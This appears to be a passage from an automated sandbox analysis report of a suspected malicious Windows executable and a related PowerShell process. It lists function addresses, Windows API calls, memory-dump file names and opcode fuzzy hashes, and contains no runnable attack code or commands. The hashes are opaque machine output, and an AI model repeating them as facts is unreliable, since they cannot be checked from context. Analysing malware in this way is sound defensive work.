                                                                                                                                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3748168415-3916222277
                                                                                                                                                                                      • Opcode ID: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
                                                                                                                                                                                      • Instruction ID: 994decb8795c597c60d879b60f38f30bda4d2919c1ffc13ce94f3a2918c86729
                                                                                                                                                                                      • Opcode Fuzzy Hash: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1C01717120060CBFEF219F11DD84A9B3B67EB84794F144037FA41761D5C7398D529A6D
                                                                                                                                                                                      Function 00406425 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,00000800,00000000,?,?,?,?,: Completed,?,00000000,00406696,80000002), ref: 0040646B
                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00406476
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CloseQueryValue
                                                                                                                                                                                      • String ID: : Completed
                                                                                                                                                                                      • API String ID: 3356406503-2954849223
                                                                                                                                                                                      • Opcode ID: 2e643289fb710728f9e71b764b537af101e4effe49772c5ab4cbf1728bf19f20
                                                                                                                                                                                      • Instruction ID: 70129269225b3d2074805611e9e9ab3b6623f97616b55adb64abfcd2b3eb4ee3
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2e643289fb710728f9e71b764b537af101e4effe49772c5ab4cbf1728bf19f20
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F017172540209AADF21CF51CC05EDB3BA8EB54364F114439FD1596190D738D964DBA4
                                                                                                                                                                                      Function 00403B94 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,76233420,00000000,C:\Users\user\AppData\Local\Temp\,00403B6C,00403A82,?,?,00000008,0000000A,0000000C), ref: 00403BAE
                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00403BB5
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B94
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Free$GlobalLibrary
                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                      • API String ID: 1100898210-3936084776
                                                                                                                                                                                      • Opcode ID: 522759d04011631da2fa13ba2704cf46823a2ab452b41ebb0ecea140ccdeae61
                                                                                                                                                                                      • Instruction ID: cb28855b84c3abb27e6c937247341fa4f051846acd49e0d4b6103447305c23c4
                                                                                                                                                                                      • Opcode Fuzzy Hash: 522759d04011631da2fa13ba2704cf46823a2ab452b41ebb0ecea140ccdeae61
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5DE0C23362083097C6311F55EE04B1A7778AF89B2AF01402AEC407B2618B74AC538FCC
                                                                                                                                                                                      Function 00405E72 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\av8XPPpdBc.exe,C:\Users\user\Desktop\av8XPPpdBc.exe,80000000,00000003), ref: 00405E78
                                                                                                                                                                                      • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\av8XPPpdBc.exe,C:\Users\user\Desktop\av8XPPpdBc.exe,80000000,00000003), ref: 00405E88
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CharPrevlstrlen
                                                                                                                                                                                      • String ID: C:\Users\user\Desktop
                                                                                                                                                                                      • API String ID: 2709904686-3125694417
                                                                                                                                                                                      • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                                                                                                                                                      • Instruction ID: c6f1eefeac9f22653a6718740f6635ad40246fc98af2d22d27e4b5974eb8f820
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                                                                                                                                                      • Instruction Fuzzy Hash: E1D0A7B3400930EEC312AB04EC04DAF73ACEF123007868827F980A7165D7785D81C6EC
                                                                                                                                                                                      Function 00405FAC Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
                                                                                                                                                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FD4
                                                                                                                                                                                      • CharNextA.USER32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FE5
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 190613189-0
                                                                                                                                                                                      • Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                                                                                                                                                      • Instruction ID: e9567a821587a5f0376c4e2be66d4cfc8c6f540c5076303c4651ac02cb4e93c6
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                                                                                                                                                      • Instruction Fuzzy Hash: E1F09631105519FFC7029FA5DE00D9FBBA8EF05350B2540B9F840F7250D678DE01AB69

                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                      Function 076661A0 Relevance: 1.0, Instructions: 988COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2523159102.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7660000_powershell.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: d401e0fd6b7d1c858e60115e160970eeb7ebbbd7107e4134cb50fe57280d7f0f
                                                                                                                                                                                      • Instruction ID: 80122294171ea452ede8b481a6b10108b9a8dc4302f0dac3dc05424c664f2272
                                                                                                                                                                                      • Opcode Fuzzy Hash: d401e0fd6b7d1c858e60115e160970eeb7ebbbd7107e4134cb50fe57280d7f0f
                                                                                                                                                                                      • Instruction Fuzzy Hash: F182A2B0B002559FDB14CF68C854BAABBB2AF85714F54C099D949AF342CB71EC86CF91
                                                                                                                                                                                      Function 07666FC8 Relevance: .6, Instructions: 646COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2523159102.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7660000_powershell.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 56e3071985ce1c4a959620bf4ecb2eb70e04a5f7fabe1e9771626a6948794e66
                                                                                                                                                                                      • Instruction ID: 5ff6bb5e99c578b57c6dfeac872a355cc1554ff5199599a4f09b1db205b61b45
                                                                                                                                                                                      • Opcode Fuzzy Hash: 56e3071985ce1c4a959620bf4ecb2eb70e04a5f7fabe1e9771626a6948794e66
                                                                                                                                                                                      • Instruction Fuzzy Hash: A3525EB4B002159FD714CF68C854FAAB7B2AF89714F54C099D909AB352CB72ED82CF91
                                                                                                                                                                                      Function 0766C329 Relevance: .6, Instructions: 620COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2523159102.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7660000_powershell.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: a07b3b6b17620d031d11a41062cdb50ad538dafdda3b74991d1f9bc92cfff1ec
                                                                                                                                                                                      • Instruction ID: 43e37192f00d5036c07c3f9e6022a4031a9ed04b450e383acca4bd63cc64b00b
                                                                                                                                                                                      • Opcode Fuzzy Hash: a07b3b6b17620d031d11a41062cdb50ad538dafdda3b74991d1f9bc92cfff1ec
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6F425EB47102149FDB14DB58CC50BEABBB2EB8A714F508099D909AF745CB72ED82CF91
                                                                                                                                                                                      Function 07662070 Relevance: .6, Instructions: 599COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2523159102.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7660000_powershell.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 1654ab7de6fced5c1151dadf78e76a20f8dc732b90a010a914c21795648569b2
                                                                                                                                                                                      • Instruction ID: 63bd87697100c757a95358a5859030a7d554960badc1f57437d5335a9b87b8ab
                                                                                                                                                                                      • Opcode Fuzzy Hash: 1654ab7de6fced5c1151dadf78e76a20f8dc732b90a010a914c21795648569b2
                                                                                                                                                                                      • Instruction Fuzzy Hash: 711228B17042529FDB259B78C8287BABBA2BFC5210F5480ABD546DF351DB31CC46C7A2
                                                                                                                                                                                      Function 076679D0 Relevance: .6, Instructions: 591COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2523159102.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7660000_powershell.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 9d7012b8fda6d9fb7626818c2cca0a60de89e9ff546b6cff8f9fedf84dd83587
                                                                                                                                                                                      • Instruction ID: 7d9064b56e4f1bfba0224f32fd2cec62e33a93d609fa7e1e424bc821faee2774
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9d7012b8fda6d9fb7626818c2cca0a60de89e9ff546b6cff8f9fedf84dd83587
                                                                                                                                                                                      • Instruction Fuzzy Hash: 89325EB4B00255AFDB04CFA8C854FA9B7B2AF85714F648059E905AF355CB72EC82CF91
                                                                                                                                                                                      Function 07665568 Relevance: .6, Instructions: 588COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2523159102.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7660000_powershell.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 428a151b9b623dd8c0bace40fcfac7ec49e9e3e072af06590fa2a1c25cb13204
                                                                                                                                                                                      • Instruction ID: f01d47b1ac565cd022a02734369268d636709e82f2ad63a56d5c56483fc47a3a
                                                                                                                                                                                      • Opcode Fuzzy Hash: 428a151b9b623dd8c0bace40fcfac7ec49e9e3e072af06590fa2a1c25cb13204
                                                                                                                                                                                      • Instruction Fuzzy Hash: 741255B1704346DFDB188F79C8556AABBA2EFC5610B68806BD807CB352DB31CD51CBA1
                                                                                                                                                                                      Function 0766BB38 Relevance: .5, Instructions: 502COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2523159102.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7660000_powershell.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: f90258e56d7db0c9f625c9acca1e131c6b1a82ee1368d450e65f0e6a50c6b5ce
                                                                                                                                                                                      • Instruction ID: ee0699f14c03efcdccd721dd2e890a9eb7a3fa922c2bf5d60fa00e5831e8d089
                                                                                                                                                                                      • Opcode Fuzzy Hash: f90258e56d7db0c9f625c9acca1e131c6b1a82ee1368d450e65f0e6a50c6b5ce
                                                                                                                                                                                      • Instruction Fuzzy Hash: A1223FB47103149FDB14DB58C850FEABBA2EB8A714F508099D9096F791CB72ED82CF91
                                                                                                                                                                                      Function 076670DC Relevance: .5, Instructions: 484COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2523159102.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7660000_powershell.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: ac2d4f40ae9c25a327fe77f11a3b7817706335d524e597587d987bb5493dea07
                                                                                                                                                                                      • Instruction ID: 29f2fcb76964fb00644b5e447b5c792c111b46b467ed57069cf250c68c225a22
                                                                                                                                                                                      • Opcode Fuzzy Hash: ac2d4f40ae9c25a327fe77f11a3b7817706335d524e597587d987bb5493dea07
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D225FB47002159FD714DF58C894FAAB7B2AF89714F14C099D909AB392CB72ED81CF91
                                                                                                                                                                                      Function 0766C410 Relevance: .5, Instructions: 467COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2523159102.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7660000_powershell.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: ee389f3544ed465d457a4dc58cba09c86eefbda71c8705432c7401c9cd6d5b40
                                                                                                                                                                                      • Instruction ID: 89cfee2c5f855fd8f6fd2a01ec6d9a14e4a5899b3f83d77cace2472c97af19f2
                                                                                                                                                                                      • Opcode Fuzzy Hash: ee389f3544ed465d457a4dc58cba09c86eefbda71c8705432c7401c9cd6d5b40
                                                                                                                                                                                      • Instruction Fuzzy Hash: B8123FB47103149FDB14DB58C850FEABBA2EB89714F518099D909AF781CB72ED82CF91
                                                                                                                                                                                      Function 076679AD Relevance: .4, Instructions: 437COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2523159102.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7660000_powershell.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: ce183782539dbcbdb9a9bbc9d74f510448215b9733267bd4a7dad8079295ede6
                                                                                                                                                                                      • Instruction ID: da360af1541a5bd1655bd3e951a80ad05c9a2ab80d8daa5cb99ef73d06b048ec
                                                                                                                                                                                      • Opcode Fuzzy Hash: ce183782539dbcbdb9a9bbc9d74f510448215b9733267bd4a7dad8079295ede6
                                                                                                                                                                                      • Instruction Fuzzy Hash: C9025DB4A00255AFDB04CFA8C844FA9BBB2EF85714F658059E905AB355C772EC82CF91
                                                                                                                                                                                      Function 07664548 Relevance: .4, Instructions: 434COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2523159102.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7660000_powershell.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: c6bba32940776a6fb6871a99606b4a828f3cfb3c03dc7d534ae6b270c94b1baf
                                                                                                                                                                                      • Instruction ID: b535340006a1be356b5705fc66c491296587cefe37f51f4d54bd3ac1476c361c
                                                                                                                                                                                      • Opcode Fuzzy Hash: c6bba32940776a6fb6871a99606b4a828f3cfb3c03dc7d534ae6b270c94b1baf
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3B0292B0B01245AFD714CFA8C454BAABBB2EF89714F14C069E905AB355CB72ED42CF91
                                                                                                                                                                                      Function 093A1120 Relevance: .4, Instructions: 430COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2530345234.00000000093A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093A0000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_93a0000_powershell.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 087d3ec00507efdf7c31e956ae56fcb9155700e02342508a6724ad34a88e8f7e
                                                                                                                                                                                      • Instruction ID: 05ffee395092fcc01e7784705fac3b7e7154491c3749faced4ce83c2d2cc523a
                                                                                                                                                                                      • Opcode Fuzzy Hash: 087d3ec00507efdf7c31e956ae56fcb9155700e02342508a6724ad34a88e8f7e
                                                                                                                                                                                      • Instruction Fuzzy Hash: C3022B75A05219DFDB15CFA8D884AAEBBB2FF88314F248159E805AB361D731ED41CF90
                                                                                                                                                                                      Function 093A20C0 Relevance: .4, Instructions: 425COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2530345234.00000000093A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093A0000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_93a0000_powershell.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 1b935c9bf104ad5c2f2504eb6ddd9164ff89114d5c025370cd57ef58521b4cab
                                                                                                                                                                                      • Instruction ID: 15dc210c90606ab77223c794a8738edc0c94631ab0af9ec463f783d6262d1372
                                                                                                                                                                                      • Opcode Fuzzy Hash: 1b935c9bf104ad5c2f2504eb6ddd9164ff89114d5c025370cd57ef58521b4cab
                                                                                                                                                                                      • Instruction Fuzzy Hash: BB021C35A01209DFDB15CF98D894AAEBBB2FF89310F248159E915AB365C731ED41CF90
                                                                                                                                                                                      Function 093A2680 Relevance: .4, Instructions: 409COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2530345234.00000000093A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093A0000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_93a0000_powershell.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 08b35a9824eaf7b7301693048ee85ba2c7e0a0357a860d4ea4c85f78ee3ed908
                                                                                                                                                                                      • Instruction ID: 377c88ad1c402763859a02ee36468f43ec74e13a9442cb1dd564f9217f32b4e1
                                                                                                                                                                                      • Opcode Fuzzy Hash: 08b35a9824eaf7b7301693048ee85ba2c7e0a0357a860d4ea4c85f78ee3ed908
                                                                                                                                                                                      • Instruction Fuzzy Hash: 51021C74A01219DFDB15CF98C494AAEBBB2FF88310F248159E915AB365C731ED92CF90
                                                                                                                                                                                      Function 093A16E8 Relevance: .4, Instructions: 398COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2530345234.00000000093A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093A0000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_93a0000_powershell.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 3e7ce1f0b7f6c5f18b37cc522ede1a24a60aab2eab9c51ed1c638565b2a058ef
                                                                                                                                                                                      • Instruction ID: 95fc63a35690d9959c4d10db23c29f47bd4f78fc2fcbf98285a839c3430b728b
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3e7ce1f0b7f6c5f18b37cc522ede1a24a60aab2eab9c51ed1c638565b2a058ef
